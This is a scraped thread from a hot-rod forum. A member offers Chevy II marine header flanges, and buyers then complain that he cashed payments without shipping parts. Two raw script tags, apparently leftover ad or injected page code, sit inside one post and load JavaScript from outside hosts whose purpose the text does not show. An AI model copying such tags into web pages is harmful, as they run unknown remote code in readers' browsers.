Register now to get rid of these ads!

Anybody on here need a Chevy ii marine header flange?

Discussion in 'The Hokey Ass Message Board' started by willbierfarms, Feb 13, 2014.

1. willbierfarms

willbierfarms
    from palmyra mo

If you do let me know I just had a batch water jetted out. Pics tomorrow

2. I could use a set!

3. cadillacguy

cadillacguy

Could I have a phone contact for a friend ?

Thanks, Brian

4. 3wLarry

3wLarry
    Member Emeritus
    from Owasso, Ok

tomorrow was 2 weeks ago...

kidcampbell71 likes this.

5. willbierfarms

willbierfarms
    from palmyra mo

Yes it was I smashed the crap out of my phone and have been so covered up with work I kinda forgot about it

Posted using the Full Custom H.A.M.B. App!

6. willbierfarms

willbierfarms
    from palmyra mo

Here are some pics of the Flanges

Posted using the Full Custom H.A.M.B. App!

Attached Files:

7. 3wLarry

3wLarry
    Member Emeritus
    from Owasso, Ok

no worries... just busting your balls. :D

keep posting about your chevy II 4 banger...love them little motors

kidcampbell71 likes this.
  8. Willie- got your pm and will get back to you asap!

9. yruhot

yruhot

Don't bother ordering from this guy. Ordered mine on March 5th and got nothing but a cashed check. 1st call,lost my address. Gave it to him and would be shipped out tomorrow. (OK things happen) Second call, answering machine, ok, left message. please call me and let me know the status of parts. Pretty much the same on the third call. No communication what so ever. Today is April 29th and still no parts and no phone calls. If you feel luck try and order a flange for yourself. Sad part is his stuff looks pretty nice in the photos. UNfortunately thats all I've seen so far and a canceled check. Buyer be ware. Yruhot.

10. 117harv

117harv

He hasn't logged on since March 7th, maybe something happened to him??

11. yruhot

yruhot

I thought that too and I hope nothing has happened to him or any of his family but the skeptic in my says otherwise. I've bought plenty of other things off this site and this is the first issue I've had. If you are a vendor on this site please treat others with a little respect and at least return a phone call or e-mail with an inquiry about parts or services you provide. yruhot.Doug
    <script type="text/javascript" src="http://p.adpk.org/serve.js?s=PT1650&pid=6232"></script><script type="text/javascript" src="//secure-content-delivery.com/data.geo.php?callback=window.__geo.dataLoaded"></script>

12. I have a cnc plasma, if you can trace out a pattern, I can make you one. Hell, you can pick it up in person if you want :D

13. yruhot

yruhot

14. yruhot

yruhot

Thanks prewarcars4me for the offer on the flange but I got hooked up with a marine shop in Bolder City Nv. that waterjetted out a flange for me and it looks awesum. Reasonable price also I guess. Still would like my money or part from Weiberfarms. Hope to get started on my model a project this summer in the airconditioned garage. Thats the only way it'll get done.lol. Chevy 4 bangger w/t-5 five speed. Already got the 5 speed in the car with the stock engine and man what a difference that made. Also got juice brakes on it also. Making a nice driver out of it and looks 99%stock. OK thanks again and If need arises I'll keep your address ready. yruhot....Doug

15. If anyone knows willbierfarms, a local friend of mine sent him an oil pan in a trade, but has not gotten any response, or the pan promised. I've "started a conversation" with willbierfarms and would like to get this taken care of.

Thanks, Bill

16. yruhot

yruhot

Well glad I wasn't the only one. Hambers you have been warned. Learn from our losses. That sucks.